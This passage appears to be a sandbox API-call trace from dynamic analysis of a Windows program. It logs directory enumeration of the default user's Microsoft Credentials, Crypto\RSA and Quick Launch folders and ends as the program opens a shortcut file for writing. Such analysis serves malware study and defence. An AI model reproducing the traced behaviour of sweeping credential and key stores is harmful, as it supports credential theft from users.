ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0158.125] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.125] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.126] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0158.126] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0158.126] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0158.126] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0158.127] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0158.127] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0158.127] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.128] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.128] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.128] CoTaskMemFree (pv=0x508980) [0158.128] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.129] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.130] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.130] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.130] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.131] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.131] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.131] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.131] CoTaskMemFree (pv=0x508980) [0158.132] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.132] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.132] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0158.132] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0158.133] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.133] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.133] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0158.133] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.134] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.134] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.134] CoTaskMemFree (pv=0x508980) [0158.134] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.135] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.135] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.135] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.135] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.136] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.136] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.136] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.136] CoTaskMemFree (pv=0x508980) [0158.137] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.137] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.137] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0158.137] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0158.138] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.138] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.138] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0158.139] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.139] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.139] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.139] CoTaskMemFree (pv=0x508980) [0158.139] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x2aee3c | out: lpFindFileData=0x2aee3c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0158.171] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de4960a, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e1692f0, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de234aa, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0158.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0158.172] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de6f76b, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0158.173] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.173] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.175] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, 